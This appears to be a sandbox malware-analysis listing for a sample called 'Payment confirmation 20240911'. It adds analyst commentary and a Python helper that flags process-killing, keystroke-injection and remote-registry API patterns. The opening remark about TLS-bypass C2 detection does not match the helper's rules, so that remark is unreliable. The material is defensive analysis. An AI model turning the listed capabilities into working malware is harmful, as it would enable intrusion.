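Running it over the constructed sample flags 01334CE1 as the call that ORs SECURITY_FLAG_IGNORE_UNKNOWN_CA into the request's security flags before HttpSendRequestW, which is the point to look for when deciding whether the sample's C2 traffic will survive a TLS interception proxy with an untrusted root; the ordinal table resolves #17 to recvfrom, matching the inet_ntoa call that follows it in the listing.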
                                          APIs
                                          • LoadImageW.USER32 ref: 0135E9EA
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0135EA0B
                                          • LoadImageW.USER32 ref: 0135EA20
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0135EA3D
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0135EA64
                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,012FA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0135EA6F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0135EA8C
                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,012FA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0135EA97
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                          • String ID:
                                          • API String ID: 1268354404-0
                                          • Opcode ID: 0aea748376878a89982672dce8ea952337182ce67a0c6bbd5a990815ee8e14e5
                                          • Instruction ID: 559ac6fb58ac6c2ca59155f6eae9b6f437aa496b9d07e027909112ef177130f2
                                          • Opcode Fuzzy Hash: 0aea748376878a89982672dce8ea952337182ce67a0c6bbd5a990815ee8e14e5
                                          • Instruction Fuzzy Hash: 64515E74610205EFEF21DF68C885FAABBF9BB48754F10462DFA5A97290D7B0E940CB50
                                          APIs
                                          • ShowWindow.USER32(00000000,000000FF), ref: 012FF737
                                          • ShowWindow.USER32(00000000,00000000), ref: 012FF77E
                                          • ShowWindow.USER32(00000000,00000006), ref: 0135EB55
                                          • ShowWindow.USER32(00000000,000000FF), ref: 0135EBC1
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 44df622400a04e109c5c68f47137c2b531dd4c23bcbd4259b357111fc508fc38
                                          • Instruction ID: 6f799ca0890a22eed1ce0622720e4aeab12046b569d8f4cc203297bef1b47765
                                          • Opcode Fuzzy Hash: 44df622400a04e109c5c68f47137c2b531dd4c23bcbd4259b357111fc508fc38
                                          • Instruction Fuzzy Hash: 9F412B33238682DBEB7D463C8AC8E36FE9A6B45316F58483DE787C2565C6B0A440C721
                                          APIs
                                            • Part of subcall function 0131E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0131E158
                                            • Part of subcall function 0131E138: GetCurrentThreadId.KERNEL32(00000000,?,0131CDFB,?,00000001), ref: 0131E15F
                                            • Part of subcall function 0131E138: AttachThreadInput.USER32(00000000,?,0131CDFB), ref: 0131E166
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE06
                                          • PostMessageW.USER32 ref: 0131CE23
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0131CE26
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE2F
                                          • PostMessageW.USER32 ref: 0131CE4D
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0131CE50
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE59
                                          • PostMessageW.USER32 ref: 0131CE70
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0131CE73
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 1c7f4ee689c31b43f67746e12560d7589ee5ab6057ec84e85cc2c8a756f35e76
                                          • Instruction ID: 65616fdaaf284f0ac48f2f11a8d5d234cded521efc0e54368b98ffc6a6e6a987
                                          • Opcode Fuzzy Hash: 1c7f4ee689c31b43f67746e12560d7589ee5ab6057ec84e85cc2c8a756f35e76
                                          • Instruction Fuzzy Hash: 6811E1B1650618BEF7212BA48C8DF6A7A2DDB0C765F500415F2806B0E4C9F26C008BB4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 33310474df0229318376e6cb67b195f7de80ea8c1f5b3ada70b0c766623eac6f
                                          • Instruction ID: bb9d0a6965b916c182bf4c5fdbe4718815dd1ba2e863a19b37fd9907c58925c6
                                          • Opcode Fuzzy Hash: 33310474df0229318376e6cb67b195f7de80ea8c1f5b3ada70b0c766623eac6f
                                          • Instruction Fuzzy Hash: F2E1C671A0021AAFDF15DFA8C894BEE77B9FF88358F14802AE945B7281D7709D41CB94
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01349926
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0134993A
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01349954
                                          • _wcscat.LIBCMT ref: 013499AF
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 013499C6
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 013499F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: a32334edc730aacc6a2cabbb8474b1f3c2970dc7d28e79fe07ee6c156285043c
                                          • Instruction ID: 245288475a4b316e65fc4797f515debdcc068f6dc93af7ff56b1d78c6aeef4c6
                                          • Opcode Fuzzy Hash: a32334edc730aacc6a2cabbb8474b1f3c2970dc7d28e79fe07ee6c156285043c
                                          • Instruction Fuzzy Hash: 9D41A871A00349EFEF219FA8C885FEF7BE8EF08358F10452AF555A7291D671A9848B50
                                          APIs
                                            • Part of subcall function 01326F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01326F7D
                                            • Part of subcall function 01326F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 01326F8D
                                            • Part of subcall function 01326F5B: CloseHandle.KERNEL32(00000000), ref: 01327022
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0134168B
                                          • GetLastError.KERNEL32 ref: 0134169E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 013416CA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 01341746
                                          • GetLastError.KERNEL32(00000000), ref: 01341751
                                          • CloseHandle.KERNEL32(00000000), ref: 01341786
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: f90a635a475b06041be95a0d43f8a0e529506f786efeb7605ec4ba1c47aaca8e
                                          • Instruction ID: da57f7af74b24d80be7527556484d3d83125badf299d48a800c1bcb855cc8ad9
                                          • Opcode Fuzzy Hash: f90a635a475b06041be95a0d43f8a0e529506f786efeb7605ec4ba1c47aaca8e
                                          • Instruction Fuzzy Hash: 6F41C371700206AFDB15EF98C8E4F7DBBE5AF58318F048059EA069F291DBB5E844CB90
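The two entries above are the ones an analyst would want to pull out of this listing automatically: a keystroke-sending routine (AttachThreadInput, MapVirtualKeyW, PostMessageW, Sleep) and a process-close routine that enumerates processes via Toolhelp32, opens them with OpenProcess and calls TerminateProcess while referencing the string SeDebugPrivilege. The helper below is an added example written for this page; it is not Joe Sandbox code and not part of the analysed sample. It assumes the line shapes shown on this page (an "APIs" header per function, "• Api.MODULE(...), ref: addr" call lines, and a "• String ID: a$b" line), the rule names and API/string combinations are this example's own choices, and the SAMPLE text is constructed from lines in that shape. One caveat before trusting hits: the error-format string "%s (%d) : ==> %s: %s %s" and the icon/control names elsewhere in this listing look like interpreter runtime helpers rather than hand-written payload code (an inference from the strings, not something the report states), so API-combination hits on such functions are weak evidence on their own and should be corroborated with the dynamic signatures listed at the top of the report.

```python
"""Triage helper for Joe Sandbox-style function listings (added example)."""
import re

# One API call line of the report, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0134168B
#   • Part of subcall function 01326F5B: Process32FirstW.KERNEL32(...), ref: ...
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:.*?\bref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)
# The "String ID" line of an entry; individual strings are '$'-separated.
STRING_LINE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")

# Rule = (name, APIs that must all appear, strings that must all appear).
# These combinations and names are this example's own, not Joe Sandbox scoring.
RULES = [
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW"}, set()),
    ("process-kill-with-debug-priv", {"OpenProcess", "TerminateProcess"}, {"SeDebugPrivilege"}),
    ("synthesized-keystrokes", {"AttachThreadInput", "PostMessageW"}, set()),
    ("remote-registry", {"RegConnectRegistryW"}, set()),
]

# Constructed sample in the shape of the report's own listing (four entries).
SAMPLE = """\
APIs
• Part of subcall function 01326F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01326F7D
• Part of subcall function 01326F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 01326F8D
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0134168B
• TerminateProcess.KERNEL32(00000000,00000000), ref: 01341746
• CloseHandle.KERNEL32(00000000), ref: 01341786
Strings
• String ID: SeDebugPrivilege
APIs
• Part of subcall function 0131E138: AttachThreadInput.USER32(00000000,?,0131CDFB), ref: 0131E166
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE06
• PostMessageW.USER32 ref: 0131CE23
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342AE7
APIs
• GetDC.USER32(00000000), ref: 01348CFB
• CreateFontW.GDI32(?,00000000), ref: 01348D4E
"""


def _new_entry():
    return {"apis": set(), "modules": {}, "strings": set(), "refs": []}


def parse_entries(text):
    """Split report text into per-function entries.

    Every "APIs" header starts a new entry; API call lines and the
    "String ID:" line are collected into the entry they follow. Content
    seen before the first header goes into an implicit first entry.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = _new_entry()
            entries.append(current)
            continue
        m = STRING_LINE.match(line) or API_LINE.match(line)
        if not m:
            continue  # headers, dump sources, hashes and other metadata
        if current is None:
            current = _new_entry()
            entries.append(current)
        if "ids" in m.groupdict():
            current["strings"].update(s.strip() for s in m.group("ids").split("$") if s.strip())
        else:
            current["apis"].add(m.group("api"))
            current["modules"][m.group("api")] = m.group("module")
            if m.group("ref"):
                current["refs"].append(m.group("ref"))
    return entries


def match_rules(entry):
    """Names of all rules whose API set and string set are both satisfied."""
    return [name for name, apis, strings in RULES
            if apis <= entry["apis"] and strings <= entry["strings"]]


def triage(text):
    """[(entry_index, [rule names]), ...] for entries that hit at least one rule."""
    results = []
    for i, entry in enumerate(parse_entries(text)):
        hits = match_rules(entry)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE):
        print(f"entry {idx}: {', '.join(hits)}")
```

Run it against a saved copy of the report's "Execution Graph"/function listing and the entries flagged by more than one rule (here, the process-close routine) are the ones worth opening in the disassembly first; the ref addresses collected per entry give the jump targets.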
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0$`"u
                                          • API String ID: 3866635326-2270789441
                                          • Opcode ID: 7f1ee1873f85bdb7c3c9be7b8c2e8a63aa11cba20966957cd72b1ff77dca3606
                                          • Instruction ID: 5da128d12ec53b5b7be2bdfa30727bcda04dd3b57e67d9f41bf4c322c54e73bf
                                          • Opcode Fuzzy Hash: 7f1ee1873f85bdb7c3c9be7b8c2e8a63aa11cba20966957cd72b1ff77dca3606
                                          • Instruction Fuzzy Hash: 5B412975A0020AEFEB20DF94D484F9A7BF8FF09358F048119EA5997251D730F994DB50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 6d3ae08f5d169e4d1d822d6adc59d6905ac8db285c73684de71cdf2c17b84c3c
                                          • Instruction ID: fca3802f1a03768cff25d29f816da0d5e5df74fe53ce47e2b8a8d8255f0f058d
                                          • Opcode Fuzzy Hash: 6d3ae08f5d169e4d1d822d6adc59d6905ac8db285c73684de71cdf2c17b84c3c
                                          • Instruction Fuzzy Hash: BA11D0B53087577AE7066A599C93D6E77DCAF1773CB10002DFD0166682EBB0A9404664
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 01327595
                                          • LoadStringW.USER32(00000000), ref: 0132759C
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 013275B2
                                          • LoadStringW.USER32(00000000), ref: 013275B9
                                          • _wprintf.LIBCMT ref: 013275DF
                                          • MessageBoxW.USER32 ref: 013275FD
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 013275DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: de978c1bcc214f030fdded03166160a656e120a72236456805382fddb78d029c
                                          • Instruction ID: c3bcd79003754fd93fdadf9936141abb1c795fa46f646d08b0f36e63cd04df96
                                          • Opcode Fuzzy Hash: de978c1bcc214f030fdded03166160a656e120a72236456805382fddb78d029c
                                          • Instruction Fuzzy Hash: 3F016DF2A00208FFEB21A7E49C89EE7776CEB08304F004495F746E2045EAB49E848B75
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342AE7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3479070676-0
                                          • Opcode ID: bfdf0aafae8e76dbe4e1a941747b71c6722246ade3961d7e57f5c7f554fa58cc
                                          • Instruction ID: 1a897225a38383e7345f0b37dbf061696da531f52cc473260697bfc999b89576
                                          • Opcode Fuzzy Hash: bfdf0aafae8e76dbe4e1a941747b71c6722246ade3961d7e57f5c7f554fa58cc
                                          • Instruction Fuzzy Hash: 5A917C712142069FCB14EF98D894B6EB7E5FF98318F04881DFA96972A0DB34E945CF42
                                          APIs
                                          • __mtinitlocknum.LIBCMT ref: 0130B744
                                            • Part of subcall function 01308A0C: __FF_MSGBANNER.LIBCMT ref: 01308A21
                                            • Part of subcall function 01308A0C: __NMSG_WRITE.LIBCMT ref: 01308A28
                                            • Part of subcall function 01308A0C: __malloc_crt.LIBCMT ref: 01308A48
                                          • __lock.LIBCMT ref: 0130B757
                                          • __lock.LIBCMT ref: 0130B7A3
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01396948,00000018,01316C2B,?,00000000,00000109), ref: 0130B7BF
                                          • EnterCriticalSection.KERNEL32(8000000C,01396948,00000018,01316C2B,?,00000000,00000109), ref: 0130B7DC
                                          • LeaveCriticalSection.KERNEL32(8000000C), ref: 0130B7EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                          • String ID:
                                          • API String ID: 1422805418-0
                                          • Opcode ID: 73c513afbc1483acec1bb2ff12fe02b46dd067e16b2c798be4704e99599187c3
                                          • Instruction ID: ec852d557745c1cad7601103fe8fc4c0c93b94350aeead7e5ade9b2fdaa7b1b9
                                          • Opcode Fuzzy Hash: 73c513afbc1483acec1bb2ff12fe02b46dd067e16b2c798be4704e99599187c3
                                          • Instruction Fuzzy Hash: DC412775E002568FEB269F6CD864768FBE4BF0073DF14821CE425AB2E5C7749500CB94
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0132A1CE
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0132A205
                                          • EnterCriticalSection.KERNEL32(?), ref: 0132A221
                                          • _memmove.LIBCMT ref: 0132A26F
                                          • _memmove.LIBCMT ref: 0132A28C
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0132A29B
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0132A2B0
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0132A2CF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: ca0f6517fea5db24300e15ac770f02bf889fe9105ec08765de847e7c1e2ace6e
                                          • Instruction ID: 8baeee38ed514113b0d634707af218a52fc06a3acdc54150fd85e34552e11edd
                                          • Opcode Fuzzy Hash: ca0f6517fea5db24300e15ac770f02bf889fe9105ec08765de847e7c1e2ace6e
                                          • Instruction Fuzzy Hash: 1131C431A00215EFCF15EF98DD85EAEB7B8FF45714F1480A5E904AB246D770D914CB60
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 01348CF3
                                          • GetDC.USER32(00000000), ref: 01348CFB
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0134BB29,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 01348D06
                                          • ReleaseDC.USER32(00000000,00000000), ref: 01348D12
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 01348D4E
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01348D5F
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01348D99
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01348DB9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 63de0adc16524ca26f17d117596d8a73694d94e8beaa3e410647ca23d6c9a25a
                                          • Instruction ID: 0d3b9a9b492caae908a44b35cf3bf9ca302fc938e9b44c110d2a06c185ad4ada
                                          • Opcode Fuzzy Hash: 63de0adc16524ca26f17d117596d8a73694d94e8beaa3e410647ca23d6c9a25a
                                          • Instruction Fuzzy Hash: 26318B72201210BBEB218F94CC89FEA3FADEF4A765F048055FE889A195C6B59841CB70
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • _wcstok.LIBCMT ref: 01331D6E
                                          • _wcscpy.LIBCMT ref: 01331DFD
                                          • _memset.LIBCMT ref: 01331E30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
